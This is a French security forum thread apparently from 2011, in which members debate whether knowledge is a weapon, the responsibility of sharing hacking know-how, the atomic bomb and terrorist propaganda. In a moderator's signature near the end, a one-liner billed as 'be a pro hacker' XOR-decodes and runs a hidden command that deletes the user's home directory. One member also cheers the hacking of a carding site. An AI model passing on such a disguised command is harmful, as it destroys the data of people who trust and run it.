Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-05-2011 18:07:41

toto
Membre V.I.P.
Lieu : chez le docteur aussi

Débat léger

Hi

je cite "le savoir est une arme" qui pense ça ? sommes nous une armurerie ouverte ? ce site est il une hérésie de la toile ?

Je veut avoir vos avis amis passionné !!!

merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-05-2011 18:27:35

koala
Membre d'honneur
Lieu : In the sky

Re : Débat léger

Salut wink

Débat intérèssant, le savoir n'est pas une arme mais il doit etre considéré avec beaucoup d'attention et de responsabilité, tout savoir a un mérite, il peut se partager mais j'usqu'a une certaine limite.Pour moi le savoir est l'image d'un pécheur qui ramasse du poisson et qui ne dit pas son coin de peche ni les montages qu'il fait sur ses cannes a pèche.Le savoir est en général précieux et ne doit pas etre divulgué a n'importe qui sous peine que sa devienne tout et n'importe quoi au bout de quelque temps.De mon point de vue on peut dire "oui j'ai attrapé du poisson" mais on ne doit pas dire ou est comment par contre on peut aider a un certains niveau les gens cherchant a aquerir des connaissance de façon a ce qui développe par eux meme l'envie d'apprendre encore est toujours plus de savoir, comme pour un écolier, on doit lui donner l'envie d'apprendre pour qu'il utilise ce qu'il a apprit et s'en servir plus tard dans la vie et créer ainsi sa propre façon d'utiliser les connaissance qu'il a aquise de façon plus développer au cours de sa croissance.Voila c'est mon point de vue smile

Dernière modification par koala (10-05-2011 18:32:09)

#3 10-05-2011 19:16:37

toto
Membre V.I.P.

merci j'adhère tu est notre sage a tous ici wink

#4 10-05-2011 19:21:38

koala
Membre d'honneur

Sage moi? big_smile

#5 10-05-2011 19:24:20

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

koala a écrit :

Salut wink
le savoir n'est pas une arme

Je ne suis pas du tout d'accord avec ça ami plantigrade eucalyptophage wink.

Le savoir dans tous les cas "est une arme" !!!
Le concept "d'arme" peut varier selon le contexte dans lequel on le situe.

Le savoir est une arme contre la pauvreté car il permet de s'élever socialement.

Une société qui veut avoir un contrôle total sur son peuple commence toujours par leur interdire l'accès à celui-ci afin de les rendre dépendants et les empêcher de s'élever.

Ce n'est pas pour rien que bien souvent dans l'histoire les états totalitaires ont commencés leur purges dans les millieux intellectuels.
Si on prend le cas des nazis, les pogromes n'ont ils pas commençés par des bûchers ou l'on a brûlé les livres ?
Apprendre dans ce contexte, c'est déjà se battre et le savoir devient alors une arme.

On le constate dans un autre contexte encore.
Les personnes importantes de l'époque on toujours été les seules à êtres les érudits.
Il n'y a qu'à voir le statut des scribes dans l'Eypte antique. C'était des citoyens de base qui arrivaient à s'élever grace à leur savoir.

Il y a d'ailleurs une parabole encore souvent utilisée de nos jours quand on considère je cite q'u apprendre c'est accquérir les "Armes" nécéssaires pour évouler correctement dans la société.

Il n'y a pas à transiger, le savoir est une arme !!!
Une arme "même si le concept est passif", une arme contre la misère, contre l'oppression, contre le totalitarisme, contre la répression, contre la bêtise etc etc...

Tu ne peut pas lutter à armes égales si tu ne peut te confronter intellectuellement à ceux qui s'attaque à toi.

Dans un contexte de guerre par exemple c'est le savoir des stratèges qui va faire la différence dans une battaille.
Tu as beaucoups de cas ou des troupes bien moins armées ou nombreuses n'ont du leur victoire qu'à l'intelligence ou l'audace de leurs gradés.

A ce titre on peut se considérer on peut en effet se voir comme une armurerie ouverte en effet.
En revanche cette vision peut revêtir plusieurs aspects selon la personne qui l'interprète ou le contexte dans lequel on le situe.

On peut le voir comme une arme qui peut nuire, mais en regardant de plus près on peut aussi constater que ce site constitue une arme qui peut lutter et permettre aux gens de se protéger correctement en accédant à son contenu.
Je pense que c'est comme cela qu'il faut le voir.

Si le but était au contraire de nuire il serait stupide de donner aux gens les moyens de s'en prémunir en leur expiquant comment cela fonctionne.

Sin on arrive à le comprendre et à le voir ainsi alors ta troisième question n'a plus llieu d'être. wink

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 10-05-2011 19:40:56

koala
Membre d'honneur

Tu as raison sur plusieurs points c'est vrai, mais pour ma part je ne considère pas le savoir comme une arme mais plutot contre comme une façon intellectuel de lutter contre des phénomènes de société.Si je considérai que ce site est une arme, je ne le fréquenterai plus, c'est plus une barrière défensive évidement il y a surement du monde ici qui utilise le savoir comme une arme de façon a cracker leurs voisin et a ce moment le mot "arme" prend tout son sens mais je ne le vois pas ainsi pour ce site.Je pense surtout que le savoir est une question de responsabilité.

Dernière modification par koala (10-05-2011 19:42:05)

#7 10-05-2011 20:05:38

noireaude
Membre d'honneur
Site Web

La bombe atomique n'est elle pas née du cerveau d'un érudit ?
Je ne pense pas que E=mc2, aurit pu naître du cerveau d'un ahuri.
La compréhension de cette équation nous a permis d'en savoir plus sur les fondements de la matière et l'équivalence matière/énergie.

On a vu comment ça a fini, des millions de morts toutes catastrophes nucléaires confondues, entre celles qui ont déjà eu lieux, leur effets à long terme et celles qui viendront.

Si la concrètement la savoir n'a pas été une arme alors je ne sais pas comment on peut voir les choses.

Si on prend ce cas et le cas de l'armement en général, les armes réelles sont une conséquence directe du savoir.
On peut en conclure par conséquent que le savoir peut tuer et même devenir une arme de destruction massive.
Mais le concept d'arme peut également devenir bénéfique si on l'utilise pour de bonne chose.
Une arme peut tuer mais peut également défendre les deux sont indisociables.

Toute forme de savoir peut devenir une arme  je n'en démords pas et ce quelque soit le contexte dans lequel on se situe.
Le tout est de savoir après si on va s'en servir pour faire le mal ou le bien.

Notons toutefois que cela rend le débat plus complexe encore.
Je ne voulais pas entrer la dedans mais la question que l'ont peut se poser alors est qui décide de ce qui est bien ou mal.

Si quelqu'un utilise son savoir pour faire le mal en étant intimement convaincu que c'est ce qu'il doit faire est il fondamentalement coupable ?

mal au crâne smile

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#8 10-05-2011 20:17:58

koala
Membre d'honneur

La bombe atomique est une conséquence (ça n'aurait pas du exister mais bon) direct du savoir on est d'accord la dessus c'est sur smile par contre de l'acte a la conséquence, la responsabilité rentre en jeu (ou plutot l'irresponsabilité devrais-je dire...) concernant la bombe atomique.
Pour répondre a ta question (enfin essayer smile ), soit il est alliéner soit il est irresponsable, et le niveau du mal dépend de la personne en question je pense.

#9 10-05-2011 20:22:24

toto
Membre V.I.P.

une arme est aussi une dissuasion ! +1

#10 10-05-2011 20:29:57

noireaude
Membre d'honneur
Site Web

koala a écrit :

La bombe atomique est une conséquence (ça n'aurait pas du exister mais bon) direct du savoir on est d'accord la dessus c'est sur smile par contre de l'acte a la conséquence, la responsabilité rentre en jeu (ou plutot l'irresponsabilité devrais-je dire...) concernant la bombe atomique.
Pour répondre a ta question (enfin essayer smile ), soit il est alliéner soit il est irresponsable, et le niveau du mal dépend de la personne en question je pense.

Tu soulèves un point crucial en effet.
A t'on un niveau de responsabilité suffisant pour maitriser notre savoir?
Ce qu'on a pu constater jusqu'à présent tend à démontrer que non.

Pour la seconde partie je part du principe qu'il n'est pas alliéné ou atteint pathologiquement, mais simplement convaincu humainement d'agir pour ce qui lui semble juste.

#11 10-05-2011 20:40:29

M1ck3y
Administrateur
Lieu : Lost in the darkness

Vaste sujet en effet, le sujet revient régulièrement sur le forum. Si tu utilises le mot "arme" dans le sens de l'arme destinée à nuire et faire du mal, alors en effet le savoir, comme toute autre chose (un couteau, une voiture, un litre d'essence, une barre de fer) peut etre une arme par destination, c'est à dire que le savoir devient une arme lorsqu'il est mis entre de mauvaises mains. Chacun étant responsable de ses actes, il ne tient qu'à chacun d'entre nous d'utiliser le savoir qui se trouve sur le site à bon escient, car le but du site est de partager diverses connaissances dans le domaine de la sécurité informatique ce qui est un objectif tout à fait louable à la base. Pour extrapoler, si tu achète un couteau de cuisine dans un magasin et que tu l'utilise pour découper quelqu'un, le magasin n'est en aucun cas responsable. Il en va de meme pour les connaissances que nous partageons ici, chacun peut les utiliser librement et bien sur dans le lot il y en aura toujours quelques uns pour faire des conneries, mais bon ça c'est inévitable c'est dans la nature humaine.

#12 10-05-2011 20:41:30

koala
Membre d'honneur

A t'on un niveau de responsabilité suffisant pour maitriser notre savoir?

Malheureusement je pense que le savoir dépasse amplement la responsabilité.

Pour la seconde partie je part du principe qu'il n'est pas alliéné ou atteint pathologiquement, mais simplement convaincu humainement d'agir pour ce qui lui semble juste.

Tout dépend de ses convictions personnel et de ce qui lui semble "juste" ou pas.
Par exemple, une personne qui va pirater un site comportant des informations protégés et importantes suceptible de nuire a autrui me semble juste.
Par contre un islamiste qui est convaincu que sa cause est juste et qui va se faire exploser dans un coin n'est pas juste, pourtant lui pensait humainement que c'était la meilleur chose a faire.

#13 10-05-2011 20:45:32

M1ck3y
Administrateur
Lieu : Lost in the darkness

koala a écrit :

Par contre un islamiste qui est convaincu que sa cause est juste et qui va se faire exploser dans un coin n'est pas juste, pourtant lui pensait humainement que c'était la meilleur chose a faire.

En meme temps lui on lui a promis qu'en tant que martyr il allait directement se retrouver au paradis avec 50 vierges, le problème c'est qu'il l'a cru... Mais bon c'est un autre sujet. Ca débat sec ce soir!

#14 10-05-2011 20:45:39

noireaude
Membre d'honneur
Site Web

Pourtant de son point de vue et selon ses critères l'islamiste est convaincu d'agir en toute légitimité pour ceux qui lui semble juste.
Pour lui cela ne fait aucun doute.

#15 10-05-2011 20:48:30

koala
Membre d'honneur

En meme temps lui on lui a promis qu'en tant que martyr il allait directement se retrouver au paradis avec 50 vierges, le problème c'est qu'il l'a cru... Mais bon c'est un autre sujet.

La propagande a fait son effet médicale wink

Pour lui cela ne fait aucun doute.

Et c'est ça le pire

#16 10-05-2011 20:48:43

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :

Pour extrapoler, si tu achète un couteau de cuisine dans un magasin et que tu l'utilise pour découper quelqu'un, le magasin n'est en aucun cas responsable.

Ils n'avaient qy'à pratiquer des prix raisonables  hi hi lol

#17 10-05-2011 20:51:12

koala
Membre d'honneur

Destockage massif demain il parait big_smile

#18 10-05-2011 20:54:41

toto
Membre V.I.P.

koala a écrit :

une personne qui va pirater un site comportant des informations protégés et importantes susceptible de nuire a autrui me semble juste

quand je lis ça je pense a ce site carder.cc vous savez owned and exposed je suis entièrement avec ça +1 smile

#19 10-05-2011 20:55:46

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :
koala a écrit :

En meme temps lui on lui a promis qu'en tant que martyr il allait directement se retrouver au paradis avec 50 vierges, le problème c'est qu'il l'a cru... Mais bon c'est un autre sujet. Ca débat sec ce soir!

Ca n'est pas un autre débat, le terreau de terrorisme est avant tout la pauvreté et le manque d'éducation.
La plus part d'entre eux cèdent à la propagande car ils n'ont pas d'autres alternative et ne se projètent plus dans l'avenir.

Eduquer les gens et leur donner accès au savoir dans le but de les aider à s'élever dans la société.
Et donc ainsi leur permettre de leur assurer un avenir et de subvenir à leur besoins et à ceux de leur famille peut enrayer ce phénomène.

Quelqu'un qui n'a plus rien à perdre cède plus facilement à la propagande que quelqu'un qui peut se projeter dans l'avenir.

#20 10-05-2011 20:55:59

toto
Membre V.I.P.

restons léger vous avez raison big_smile

#21 10-05-2011 20:59:08

noireaude
Membre d'honneur
Site Web

toto a écrit :

restons léger vous avez raison big_smile

Dur pour une vache smile

#22 10-05-2011 21:04:08

koala
Membre d'honneur

Quelqu'un qui n'a plus rien à perdre cède plus facilement à la propagande que quelqu'un qui peut se projeter dans l'avenir.

Pas faux wink

Eduquer les gens et leur donner accès au savoir dans le but de les aider à s'élever dans la société.

Les gens qui le manipule me font franchement peur.

#23 10-05-2011 21:24:07

noireaude
Membre d'honneur
Site Web

Les gens qui le manipule me font franchement peur.

Tu peux en avoir peur ....

#24 11-05-2011 11:54:10

spawn
Modérateur

[troll]
En l'occurence, pour le nucléaire, on ne peut négliger les vitesses :
E=mc²/sqrt(1-(v/c)²)
[/troll]

plus que le savoir, il me semble que c'est le secret l'arme.
le secret mène à l'inconnu
l'inconnu mène à la peur
la peur mène à la colère
la colère mène à la haine
et la suite, on connaît.

D'où les manipulations politiques pour maîtriser ce qui se sait, ce qui se sait moins, ce qui est cru et ce qui n'est pas su.
3000 ans que ca dure  neutral

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#25 11-05-2011 12:25:04

koala
Membre d'honneur

L'homme semble s'etre faché avec lui meme sans jamais vraiment sans rendre compte.

Annonce